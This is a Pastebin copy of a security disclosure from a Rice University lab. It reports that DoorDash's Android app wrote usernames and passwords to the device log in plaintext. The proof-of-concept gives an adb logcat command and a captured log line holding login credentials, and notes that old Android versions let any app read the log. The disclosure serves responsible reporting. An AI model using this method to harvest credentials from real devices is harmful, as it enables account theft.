Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: DoorDash Android App - Username/Password Logging
- # Application: DoorDash
- # Version: 11.0.2 ~ 11.5.2 (all versions we tested have this problem)
- # Software Link: https://play.google.com/store/apps/details?id=com.dd.doordash
- # Company: DoorDash
- # Installs: 10,000,000+ (#1 in food category in Google Play)
- # Impact: Looking at the output of Logcat, hackers can get username and password of DoorDash
- # Category: Mobile Apps
- # Tested on: Android 9
- ---Description---
- Usernames and passwords are stored in the log during the authentication. So, hackers can obtain user password/ID of DoorDash, simply looking at Logcat. Especially, in old Android versions prior to Android Jelly Bean, any app installed can access Logcat without any permission.
- ---Vendor feedback---
- We have reported this issue, and they will fix it soon.
- ---PoC---
- 1. Try to log in DoorDash Android app, Android app.
- - Opening Login UI
- - Enter credentials. Fake information is enough for reproducing.
- 2. Search password in Logcat
- $ adb logcat | grep 'OkHttp'
- 10-07 16:09:34.498 10066 10201 D OkHttp : --> POST https://api.doordash.com/v2/auth/token/
- 10-07 16:09:34.498 10066 10201 D OkHttp : Content-Type: application/json; charset=UTF-8
- 10-07 16:09:34.498 10066 10201 D OkHttp : Content-Length: 109
- 10-07 16:09:34.498 10066 10201 D OkHttp : X-NewRelic-ID: XAUEWF5SGwEJUFhUDwcA
- 10-07 16:09:34.498 10066 10201 D OkHttp : {"client_id":"6086ebcbfb859ee3","email":"jaeho.lee@rice.edu","is_manual":true,"password":"MyPasswordIsHere!"}
- 10-07 16:09:34.498 10066 10201 D OkHttp : --> END POST (109-byte body)
- ---Reporter---
- Jaeho Lee(Jaeho.Lee@rice.edu)
- Rice Computer Security Lab
- Rice University
RAW Paste Data
